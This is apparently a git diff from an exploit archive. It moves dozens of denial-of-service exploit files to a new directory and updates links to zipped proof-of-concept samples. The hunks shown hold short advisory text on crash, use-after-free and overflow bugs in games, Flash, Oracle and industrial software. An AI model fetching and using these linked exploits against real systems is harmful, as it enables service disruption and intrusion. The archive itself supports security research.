at end of file diff --git a/platforms/multiple/dos/33083.txt b/exploits/multiple/dos/33083.txt similarity index 92% rename from platforms/multiple/dos/33083.txt rename to exploits/multiple/dos/33083.txt index 183b04045..0f6e93145 100644 --- a/platforms/multiple/dos/33083.txt +++ b/exploits/multiple/dos/33083.txt @@ -14,4 +14,4 @@ Oracle11g 11.1.0.7 Other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33083.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33083.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33086.txt b/exploits/multiple/dos/33086.txt similarity index 100% rename from platforms/multiple/dos/33086.txt rename to exploits/multiple/dos/33086.txt diff --git a/platforms/multiple/dos/33096.txt b/exploits/multiple/dos/33096.txt similarity index 100% rename from platforms/multiple/dos/33096.txt rename to exploits/multiple/dos/33096.txt diff --git a/platforms/multiple/dos/33099.txt b/exploits/multiple/dos/33099.txt similarity index 90% rename from platforms/multiple/dos/33099.txt rename to exploits/multiple/dos/33099.txt index 3e01b2e51..fbfb4c64e 100644 --- a/platforms/multiple/dos/33099.txt +++ b/exploits/multiple/dos/33099.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects World in Conflict 1.0.1.1 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33099.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33099.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33100.txt b/exploits/multiple/dos/33100.txt similarity index 93% rename from platforms/multiple/dos/33100.txt rename to exploits/multiple/dos/33100.txt index 2266923ad..09d11f9f6 100644 --- a/platforms/multiple/dos/33100.txt +++ b/exploits/multiple/dos/33100.txt @@ -8,4 +8,4 @@ The issue affects S.T.A.L.K.E.R. Clear Sky 1.5.10 (1.0010) and prior versions. NOTE: This issue may be related to the issue described in BID 29723 (S.T.A.L.K.E.R. Remote Denial of Service Vulnerability). We will update this BID if more information emerges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33100.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33100.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33104.txt b/exploits/multiple/dos/33104.txt similarity index 92% rename from platforms/multiple/dos/33104.txt rename to exploits/multiple/dos/33104.txt index cc2fbc211..cbbe011fb 100644 --- a/platforms/multiple/dos/33104.txt +++ b/exploits/multiple/dos/33104.txt @@ -7,4 +7,4 @@ Given the nature of this issue, the attacker may also be able to run arbitrary c This issue affects Star Wars Battlefront II 1.1 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33104.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33104.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33105.txt b/exploits/multiple/dos/33105.txt similarity index 90% rename from platforms/multiple/dos/33105.txt rename to exploits/multiple/dos/33105.txt index c7011516e..a4f2942bb 100644 --- a/platforms/multiple/dos/33105.txt +++ b/exploits/multiple/dos/33105.txt @@ -9,4 +9,4 @@ This issue affects the following: TrackMania Nations Forever 2.11.11 TrackMania United Forever 2.11.11 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33105.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33105.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33133.txt b/exploits/multiple/dos/33133.txt similarity index 100% rename from platforms/multiple/dos/33133.txt rename to exploits/multiple/dos/33133.txt diff --git a/platforms/multiple/dos/33182.txt b/exploits/multiple/dos/33182.txt similarity index 85% rename from platforms/multiple/dos/33182.txt rename to exploits/multiple/dos/33182.txt index 0cf5a01de..324511b3a 100644 --- a/platforms/multiple/dos/33182.txt +++ b/exploits/multiple/dos/33182.txt @@ -6,5 +6,5 @@ An attacker could exploit this issue to restart races on vulnerable servers, res Live For Speed S2 Z13 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33182-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33182-2.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33182-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33182-2.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33251.txt b/exploits/multiple/dos/33251.txt similarity index 100% rename from platforms/multiple/dos/33251.txt rename to exploits/multiple/dos/33251.txt diff --git a/platforms/multiple/dos/33386.html b/exploits/multiple/dos/33386.html similarity index 100% rename from platforms/multiple/dos/33386.html rename to exploits/multiple/dos/33386.html diff --git a/platforms/multiple/dos/33472.py b/exploits/multiple/dos/33472.py similarity index 100% rename from platforms/multiple/dos/33472.py rename to exploits/multiple/dos/33472.py diff --git a/platforms/multiple/dos/33483.py b/exploits/multiple/dos/33483.py similarity index 100% rename from platforms/multiple/dos/33483.py rename to exploits/multiple/dos/33483.py diff --git a/platforms/multiple/dos/33506.py b/exploits/multiple/dos/33506.py similarity index 100% rename from platforms/multiple/dos/33506.py rename to exploits/multiple/dos/33506.py diff --git a/platforms/multiple/dos/33531.py b/exploits/multiple/dos/33531.py similarity index 100% rename from platforms/multiple/dos/33531.py rename to exploits/multiple/dos/33531.py diff --git a/platforms/multiple/dos/33532.txt b/exploits/multiple/dos/33532.txt similarity index 100% rename from platforms/multiple/dos/33532.txt rename to exploits/multiple/dos/33532.txt diff --git a/platforms/multiple/dos/33556.rb b/exploits/multiple/dos/33556.rb similarity index 100% rename from platforms/multiple/dos/33556.rb rename to exploits/multiple/dos/33556.rb diff --git a/platforms/multiple/dos/33559.txt b/exploits/multiple/dos/33559.txt similarity index 100% rename from platforms/multiple/dos/33559.txt rename to exploits/multiple/dos/33559.txt diff --git a/platforms/multiple/dos/33560.txt b/exploits/multiple/dos/33560.txt similarity index 100% rename from platforms/multiple/dos/33560.txt rename to exploits/multiple/dos/33560.txt diff --git a/platforms/multiple/dos/33579.txt b/exploits/multiple/dos/33579.txt similarity index 100% rename from platforms/multiple/dos/33579.txt rename to exploits/multiple/dos/33579.txt diff --git a/platforms/multiple/dos/33584.txt b/exploits/multiple/dos/33584.txt similarity index 100% rename from platforms/multiple/dos/33584.txt rename to exploits/multiple/dos/33584.txt diff --git a/platforms/multiple/dos/33607.html b/exploits/multiple/dos/33607.html similarity index 100% rename from platforms/multiple/dos/33607.html rename to exploits/multiple/dos/33607.html diff --git a/platforms/multiple/dos/3362.py b/exploits/multiple/dos/3362.py similarity index 100% rename from platforms/multiple/dos/3362.py rename to exploits/multiple/dos/3362.py diff --git a/platforms/multiple/dos/33729.txt b/exploits/multiple/dos/33729.txt similarity index 100% rename from platforms/multiple/dos/33729.txt rename to exploits/multiple/dos/33729.txt diff --git a/platforms/multiple/dos/33735.txt b/exploits/multiple/dos/33735.txt similarity index 93% rename from platforms/multiple/dos/33735.txt rename to exploits/multiple/dos/33735.txt index 489bee524..217ed2481 100644 --- a/platforms/multiple/dos/33735.txt +++ b/exploits/multiple/dos/33735.txt @@ -9,4 +9,4 @@ SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilitie An attacker can exploit these issues to gain elevated privileges on the affected computer, crash the affected computer, gain access to sensitive information, or overwrite arbitrary files. Other attacks are also possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33735.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33735.zip \ No newline at end of file diff --git a/platforms/multiple/dos/33800.html b/exploits/multiple/dos/33800.html similarity index 100% rename from platforms/multiple/dos/33800.html rename to exploits/multiple/dos/33800.html diff --git a/platforms/multiple/dos/33876.c b/exploits/multiple/dos/33876.c similarity index 100% rename from platforms/multiple/dos/33876.c rename to exploits/multiple/dos/33876.c diff --git a/platforms/multiple/dos/33879.c b/exploits/multiple/dos/33879.c similarity index 100% rename from platforms/multiple/dos/33879.c rename to exploits/multiple/dos/33879.c diff --git a/platforms/multiple/dos/3394.php b/exploits/multiple/dos/3394.php similarity index 100% rename from platforms/multiple/dos/3394.php rename to exploits/multiple/dos/3394.php diff --git a/platforms/multiple/dos/3404.php b/exploits/multiple/dos/3404.php similarity index 100% rename from platforms/multiple/dos/3404.php rename to exploits/multiple/dos/3404.php diff --git a/platforms/multiple/dos/34058.txt b/exploits/multiple/dos/34058.txt similarity index 100% rename from platforms/multiple/dos/34058.txt rename to exploits/multiple/dos/34058.txt diff --git a/platforms/multiple/dos/3407.c b/exploits/multiple/dos/3407.c similarity index 100% rename from platforms/multiple/dos/3407.c rename to exploits/multiple/dos/3407.c diff --git a/platforms/multiple/dos/34090.py b/exploits/multiple/dos/34090.py similarity index 100% rename from platforms/multiple/dos/34090.py rename to exploits/multiple/dos/34090.py diff --git a/platforms/multiple/dos/34248.txt b/exploits/multiple/dos/34248.txt similarity index 100% rename from platforms/multiple/dos/34248.txt rename to exploits/multiple/dos/34248.txt diff --git a/platforms/multiple/dos/34261.txt b/exploits/multiple/dos/34261.txt similarity index 100% rename from platforms/multiple/dos/34261.txt rename to exploits/multiple/dos/34261.txt diff --git a/platforms/multiple/dos/34270.txt b/exploits/multiple/dos/34270.txt similarity index 92% rename from platforms/multiple/dos/34270.txt rename to exploits/multiple/dos/34270.txt index 268666f84..c3910ab24 100644 --- a/platforms/multiple/dos/34270.txt +++ b/exploits/multiple/dos/34270.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to cause denial-of-service conditions. D GRAW 1.35 and GRAW 2 1.05 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34270.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34270.zip \ No newline at end of file diff --git a/platforms/multiple/dos/3434.c b/exploits/multiple/dos/3434.c similarity index 100% rename from platforms/multiple/dos/3434.c rename to exploits/multiple/dos/3434.c diff --git a/platforms/multiple/dos/34340.txt b/exploits/multiple/dos/34340.txt similarity index 90% rename from platforms/multiple/dos/34340.txt rename to exploits/multiple/dos/34340.txt index 31b76e8e0..0c6727cb0 100644 --- a/platforms/multiple/dos/34340.txt +++ b/exploits/multiple/dos/34340.txt @@ -19,4 +19,4 @@ WarPath XIII Other games may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34340.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34340.zip \ No newline at end of file diff --git a/platforms/multiple/dos/34360.txt b/exploits/multiple/dos/34360.txt similarity index 90% rename from platforms/multiple/dos/34360.txt rename to exploits/multiple/dos/34360.txt index 18a239265..b21d90c29 100644 --- a/platforms/multiple/dos/34360.txt +++ b/exploits/multiple/dos/34360.txt @@ -4,4 +4,4 @@ Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34360.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34360.zip \ No newline at end of file diff --git a/platforms/multiple/dos/34457.txt b/exploits/multiple/dos/34457.txt similarity index 91% rename from platforms/multiple/dos/34457.txt rename to exploits/multiple/dos/34457.txt index 1cf6c96ff..cc03013aa 100644 --- a/platforms/multiple/dos/34457.txt +++ b/exploits/multiple/dos/34457.txt @@ -6,4 +6,4 @@ Successful exploits may allow remote attackers to cause denial-of-service condit Versions prior to Sniper Elite 1.0 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34457.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34457.zip \ No newline at end of file diff --git a/platforms/multiple/dos/34528.py b/exploits/multiple/dos/34528.py similarity index 100% rename from platforms/multiple/dos/34528.py rename to exploits/multiple/dos/34528.py diff --git a/platforms/multiple/dos/35086.rb b/exploits/multiple/dos/35086.rb similarity index 100% rename from platforms/multiple/dos/35086.rb rename to exploits/multiple/dos/35086.rb diff --git a/platforms/multiple/dos/35304.txt b/exploits/multiple/dos/35304.txt similarity index 100% rename from platforms/multiple/dos/35304.txt rename to exploits/multiple/dos/35304.txt diff --git a/platforms/multiple/dos/35339.txt b/exploits/multiple/dos/35339.txt similarity index 100% rename from platforms/multiple/dos/35339.txt rename to exploits/multiple/dos/35339.txt diff --git a/platforms/multiple/dos/35359.txt b/exploits/multiple/dos/35359.txt similarity index 100% rename from platforms/multiple/dos/35359.txt rename to exploits/multiple/dos/35359.txt diff --git a/platforms/multiple/dos/35369.txt b/exploits/multiple/dos/35369.txt similarity index 91% rename from platforms/multiple/dos/35369.txt rename to exploits/multiple/dos/35369.txt index 000d9f25f..0a6aae982 100644 --- a/platforms/multiple/dos/35369.txt +++ b/exploits/multiple/dos/35369.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to crash the application, resulting in a deni Battlefield 2 version 1.50 and Battlefield 2142 version 1.51 are vulnerable. Other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35369.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35369.zip \ No newline at end of file diff --git a/platforms/multiple/dos/35437.pl b/exploits/multiple/dos/35437.pl similarity index 100% rename from platforms/multiple/dos/35437.pl rename to exploits/multiple/dos/35437.pl diff --git a/platforms/multiple/dos/35465.pl b/exploits/multiple/dos/35465.pl similarity index 100% rename from platforms/multiple/dos/35465.pl rename to exploits/multiple/dos/35465.pl diff --git a/platforms/multiple/dos/35489.pl b/exploits/multiple/dos/35489.pl similarity index 100% rename from platforms/multiple/dos/35489.pl rename to exploits/multiple/dos/35489.pl diff --git a/platforms/multiple/dos/35613.py b/exploits/multiple/dos/35613.py similarity index 100% rename from platforms/multiple/dos/35613.py rename to exploits/multiple/dos/35613.py diff --git a/platforms/multiple/dos/3566.pl b/exploits/multiple/dos/3566.pl similarity index 100% rename from platforms/multiple/dos/3566.pl rename to exploits/multiple/dos/3566.pl diff --git a/platforms/multiple/dos/35725.pl b/exploits/multiple/dos/35725.pl similarity index 100% rename from platforms/multiple/dos/35725.pl rename to exploits/multiple/dos/35725.pl diff --git a/platforms/multiple/dos/35753.pl b/exploits/multiple/dos/35753.pl similarity index 100% rename from platforms/multiple/dos/35753.pl rename to exploits/multiple/dos/35753.pl diff --git a/platforms/multiple/dos/35856.html b/exploits/multiple/dos/35856.html similarity index 100% rename from platforms/multiple/dos/35856.html rename to exploits/multiple/dos/35856.html diff --git a/platforms/multiple/dos/360.pl b/exploits/multiple/dos/360.pl similarity index 100% rename from platforms/multiple/dos/360.pl rename to exploits/multiple/dos/360.pl diff --git a/platforms/multiple/dos/36007.txt b/exploits/multiple/dos/36007.txt similarity index 100% rename from platforms/multiple/dos/36007.txt rename to exploits/multiple/dos/36007.txt diff --git a/platforms/multiple/dos/36037.txt b/exploits/multiple/dos/36037.txt similarity index 100% rename from platforms/multiple/dos/36037.txt rename to exploits/multiple/dos/36037.txt diff --git a/platforms/multiple/dos/3606.py b/exploits/multiple/dos/3606.py similarity index 100% rename from platforms/multiple/dos/3606.py rename to exploits/multiple/dos/3606.py diff --git a/platforms/multiple/dos/36198.pl b/exploits/multiple/dos/36198.pl similarity index 100% rename from platforms/multiple/dos/36198.pl rename to exploits/multiple/dos/36198.pl diff --git a/platforms/multiple/dos/36234.txt b/exploits/multiple/dos/36234.txt similarity index 100% rename from platforms/multiple/dos/36234.txt rename to exploits/multiple/dos/36234.txt diff --git a/platforms/multiple/dos/36247.txt b/exploits/multiple/dos/36247.txt similarity index 100% rename from platforms/multiple/dos/36247.txt rename to exploits/multiple/dos/36247.txt diff --git a/platforms/multiple/dos/36288.php b/exploits/multiple/dos/36288.php similarity index 100% rename from platforms/multiple/dos/36288.php rename to exploits/multiple/dos/36288.php diff --git a/platforms/multiple/dos/36377.txt b/exploits/multiple/dos/36377.txt similarity index 100% rename from platforms/multiple/dos/36377.txt rename to exploits/multiple/dos/36377.txt diff --git a/platforms/multiple/dos/36378.txt b/exploits/multiple/dos/36378.txt similarity index 100% rename from platforms/multiple/dos/36378.txt rename to exploits/multiple/dos/36378.txt diff --git a/platforms/multiple/dos/36570.txt b/exploits/multiple/dos/36570.txt similarity index 89% rename from platforms/multiple/dos/36570.txt rename to exploits/multiple/dos/36570.txt index 7baf003f8..5dadc8540 100644 --- a/platforms/multiple/dos/36570.txt +++ b/exploits/multiple/dos/36570.txt @@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de An attacker can exploit these issues to crash the affected application, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36570.zip \ No newline at end of file diff --git a/platforms/multiple/dos/36840.py b/exploits/multiple/dos/36840.py similarity index 100% rename from platforms/multiple/dos/36840.py rename to exploits/multiple/dos/36840.py diff --git a/platforms/multiple/dos/36869.txt b/exploits/multiple/dos/36869.txt similarity index 100% rename from platforms/multiple/dos/36869.txt rename to exploits/multiple/dos/36869.txt diff --git a/platforms/multiple/dos/36881.txt b/exploits/multiple/dos/36881.txt similarity index 100% rename from platforms/multiple/dos/36881.txt rename to exploits/multiple/dos/36881.txt diff --git a/platforms/multiple/dos/37053.c b/exploits/multiple/dos/37053.c similarity index 100% rename from platforms/multiple/dos/37053.c rename to exploits/multiple/dos/37053.c diff --git a/platforms/multiple/dos/37061.txt b/exploits/multiple/dos/37061.txt similarity index 100% rename from platforms/multiple/dos/37061.txt rename to exploits/multiple/dos/37061.txt diff --git a/platforms/multiple/dos/3709.html b/exploits/multiple/dos/3709.html similarity index 100% rename from platforms/multiple/dos/3709.html rename to exploits/multiple/dos/3709.html diff --git a/platforms/multiple/dos/3726.c b/exploits/multiple/dos/3726.c similarity index 100% rename from platforms/multiple/dos/3726.c rename to exploits/multiple/dos/3726.c diff --git a/platforms/multiple/dos/37478.txt b/exploits/multiple/dos/37478.txt similarity index 100% rename from platforms/multiple/dos/37478.txt rename to exploits/multiple/dos/37478.txt diff --git a/platforms/multiple/dos/37487.txt b/exploits/multiple/dos/37487.txt similarity index 100% rename from platforms/multiple/dos/37487.txt rename to exploits/multiple/dos/37487.txt diff --git a/platforms/multiple/dos/37518.html b/exploits/multiple/dos/37518.html similarity index 100% rename from platforms/multiple/dos/37518.html rename to exploits/multiple/dos/37518.html diff --git a/platforms/multiple/dos/37561.pl b/exploits/multiple/dos/37561.pl similarity index 100% rename from platforms/multiple/dos/37561.pl rename to exploits/multiple/dos/37561.pl diff --git a/platforms/multiple/dos/37562.pl b/exploits/multiple/dos/37562.pl similarity index 100% rename from platforms/multiple/dos/37562.pl rename to exploits/multiple/dos/37562.pl diff --git a/platforms/multiple/dos/37639.html b/exploits/multiple/dos/37639.html similarity index 100% rename from platforms/multiple/dos/37639.html rename to exploits/multiple/dos/37639.html diff --git a/platforms/multiple/dos/37692.pl b/exploits/multiple/dos/37692.pl similarity index 100% rename from platforms/multiple/dos/37692.pl rename to exploits/multiple/dos/37692.pl diff --git a/platforms/multiple/dos/37721.c b/exploits/multiple/dos/37721.c similarity index 100% rename from platforms/multiple/dos/37721.c rename to exploits/multiple/dos/37721.c diff --git a/platforms/multiple/dos/37723.py b/exploits/multiple/dos/37723.py similarity index 100% rename from platforms/multiple/dos/37723.py rename to exploits/multiple/dos/37723.py diff --git a/platforms/multiple/dos/37766.py b/exploits/multiple/dos/37766.py similarity index 100% rename from platforms/multiple/dos/37766.py rename to exploits/multiple/dos/37766.py diff --git a/platforms/multiple/dos/3784.c b/exploits/multiple/dos/3784.c similarity index 100% rename from platforms/multiple/dos/3784.c rename to exploits/multiple/dos/3784.c diff --git a/platforms/multiple/dos/37850.txt b/exploits/multiple/dos/37850.txt similarity index 95% rename from platforms/multiple/dos/37850.txt rename to exploits/multiple/dos/37850.txt index 698af4528..eadfd8461 100644 --- a/platforms/multiple/dos/37850.txt +++ b/exploits/multiple/dos/37850.txt @@ -29,4 +29,4 @@ function f(){ A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37850.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37850.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37852.txt b/exploits/multiple/dos/37852.txt similarity index 95% rename from platforms/multiple/dos/37852.txt rename to exploits/multiple/dos/37852.txt index d50895c03..af1e8c4ed 100644 --- a/platforms/multiple/dos/37852.txt +++ b/exploits/multiple/dos/37852.txt @@ -31,4 +31,4 @@ function c(){ A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37852.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37852.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37855.txt b/exploits/multiple/dos/37855.txt similarity index 95% rename from platforms/multiple/dos/37855.txt rename to exploits/multiple/dos/37855.txt index b60e72525..0c8106265 100644 --- a/platforms/multiple/dos/37855.txt +++ b/exploits/multiple/dos/37855.txt @@ -38,4 +38,4 @@ function f(){ A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37855.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37855.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37859.txt b/exploits/multiple/dos/37859.txt similarity index 95% rename from platforms/multiple/dos/37859.txt rename to exploits/multiple/dos/37859.txt index 020bf1634..5149d8ece 100644 --- a/platforms/multiple/dos/37859.txt +++ b/exploits/multiple/dos/37859.txt @@ -54,4 +54,4 @@ function f(a, b){ A sample fla and swf are also attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37859.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37859.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37863.txt b/exploits/multiple/dos/37863.txt similarity index 92% rename from platforms/multiple/dos/37863.txt rename to exploits/multiple/dos/37863.txt index 64e397825..c72cdb236 100644 --- a/platforms/multiple/dos/37863.txt +++ b/exploits/multiple/dos/37863.txt @@ -23,4 +23,4 @@ function func() { A sample fla and swf is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37863.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37863.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37864.txt b/exploits/multiple/dos/37864.txt similarity index 94% rename from platforms/multiple/dos/37864.txt rename to exploits/multiple/dos/37864.txt index d0b35db49..a2ef2d1fc 100644 --- a/platforms/multiple/dos/37864.txt +++ b/exploits/multiple/dos/37864.txt @@ -46,4 +46,4 @@ function func(){ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37864.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37864.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37865.txt b/exploits/multiple/dos/37865.txt similarity index 92% rename from platforms/multiple/dos/37865.txt rename to exploits/multiple/dos/37865.txt index 16629aaf6..54b9b9446 100644 --- a/platforms/multiple/dos/37865.txt +++ b/exploits/multiple/dos/37865.txt @@ -16,4 +16,4 @@ _root.attachMovie("myResetButton","newResetButton",200, n); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37865.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37865.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37871.txt b/exploits/multiple/dos/37871.txt similarity index 91% rename from platforms/multiple/dos/37871.txt rename to exploits/multiple/dos/37871.txt index d08238f28..3ef282070 100644 --- a/platforms/multiple/dos/37871.txt +++ b/exploits/multiple/dos/37871.txt @@ -21,4 +21,4 @@ function func(){ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37871.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37871.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37872.txt b/exploits/multiple/dos/37872.txt similarity index 95% rename from platforms/multiple/dos/37872.txt rename to exploits/multiple/dos/37872.txt index d5b13584a..dd6d58750 100644 --- a/platforms/multiple/dos/37872.txt +++ b/exploits/multiple/dos/37872.txt @@ -20,4 +20,4 @@ In [1], the passed in index is validated. In [2], the callback can run actionscr The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37872.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37872.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37873.txt b/exploits/multiple/dos/37873.txt similarity index 93% rename from platforms/multiple/dos/37873.txt rename to exploits/multiple/dos/37873.txt index 631400668..ec16c48e3 100644 --- a/platforms/multiple/dos/37873.txt +++ b/exploits/multiple/dos/37873.txt @@ -21,4 +21,4 @@ function strfunc(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37873.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37873.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37874.txt b/exploits/multiple/dos/37874.txt similarity index 95% rename from platforms/multiple/dos/37874.txt rename to exploits/multiple/dos/37874.txt index 4d045d3b2..576789a52 100644 --- a/platforms/multiple/dos/37874.txt +++ b/exploits/multiple/dos/37874.txt @@ -13,4 +13,4 @@ This issue is low-impact because the type-confused objects are read into the fon A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37874.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37874.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37877.txt b/exploits/multiple/dos/37877.txt similarity index 93% rename from platforms/multiple/dos/37877.txt rename to exploits/multiple/dos/37877.txt index e12444ce9..cf8c34270 100644 --- a/platforms/multiple/dos/37877.txt +++ b/exploits/multiple/dos/37877.txt @@ -20,4 +20,4 @@ function func(){ A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37877.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37877.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37878.txt b/exploits/multiple/dos/37878.txt similarity index 95% rename from platforms/multiple/dos/37878.txt rename to exploits/multiple/dos/37878.txt index 09594a1fb..e7f301495 100644 --- a/platforms/multiple/dos/37878.txt +++ b/exploits/multiple/dos/37878.txt @@ -48,4 +48,4 @@ function func(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37878.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37878.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37882.txt b/exploits/multiple/dos/37882.txt similarity index 93% rename from platforms/multiple/dos/37882.txt rename to exploits/multiple/dos/37882.txt index 881bace68..7b1f42b7b 100644 --- a/platforms/multiple/dos/37882.txt +++ b/exploits/multiple/dos/37882.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=443& If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37882.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37882.zip \ No newline at end of file diff --git a/platforms/multiple/dos/37990.txt b/exploits/multiple/dos/37990.txt similarity index 